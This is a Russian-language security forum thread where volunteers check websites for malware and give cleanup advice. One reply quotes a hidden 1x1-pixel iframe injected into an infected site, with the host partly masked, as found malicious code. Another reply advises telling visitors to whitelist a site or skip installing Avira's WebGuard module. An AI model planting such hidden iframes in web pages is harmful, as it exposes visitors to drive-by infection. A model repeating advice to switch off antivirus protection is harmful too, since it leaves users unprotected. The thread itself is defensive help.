Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
24,598
Реакции
13,564
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например https://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 
Проверьте, пожалуйста, этот сайт - хттп://smatrikino2.ru/. Сам я ничего не обнаруживаю, но знакомый говорит что вроде троян там или вредоносный код.
 
вирус на сайте

Заражен.
PHP:
</script><iframe name="CMvCU" src="hттпp://li*me.ru/in.cgi?4" style="position: absolute; top: 0px; height: 1px; width: 1px; right: 0px;" id="CMvCU"></iframe>

Который транслирует с сайта fast**datee.com

http://www.virustotal.com/file-scan...66a52cd7a6f19ddae5cee9203b22e95504-1325094401
http://www.virustotal.com/file-scan...6835cc48e7a2a08eb553196e05cc7a0496-1325096193

http://geo.flagfox.net/?ip=146.185.245.49&host=fastupdatee.com
извените обясните по подробней где этот код
 
Нужно искать в шаблонах, файлах, рекламных партнерках.

0. Отключите ресурс
1. Отключите все партнерки и проверьте признаки заражения - если есть, то
2. Проверьте содержимое файлов на FTP в сравнении с исходниками движка, включая содержимое файлов .htaccess
3. Проверьте содержимое шаблонов в админке

Нашли?
1. Проверьте свой ПК на наличие вредоносного кода.
2. Смените пароли на FTP и базу данных

Удалили заражение?
1. Убедитесь, что движек ресурса является последней версией линейки и в нем отсутствуют критические уязвимости.
 
Здравствуйте akoK, хотел попросить проверить мой сайт хттп://cuckoo.ucoz.com потому что в последнее время мой антивирь Авира жалуется как какой то вирус на сайте. Заранее благодарен за помощь!
 
Последнее редактирование модератором:
Ничего вредоносного на сайте не вижу. Приложите, пожалуйста, скрин с алертом Авиры.
 
Вот скин 02.jpg
 
Cuckoo,
WebGuard в APSS ругается на javascript Укоза. В общем и правильно делает, что ругается. Это злючая реклама Укоза лезет из всех щелей. Но вы приняли соглашение на её присутствие, когда создавали сайт на этом хостинге.

Новая версия APSS уже называется Avira Internet Security. Обновите программу до актуальной версии. А своих пользователей, использующих Авиру, предупредите, чтобы они добавили ваш сайт в исключения для модуля WebGuard или при установке новой версии вообще сняли галочку на этот компоненте. Тогда он не будет установлен и не будет ругаться на рекламу этого Укоза.
 
Cuckoo, Скажу больше, модулем WebGuard занимается не сама Авира (Avira Operations GmbH & Co), а сторонная компания-партнёр, потому до них, можно сказать, не достучаться.
Более того этот модуль рубит множество рунетовских счётчиков. Даже вовсе безобидные.
 
Назад
Сверху Снизу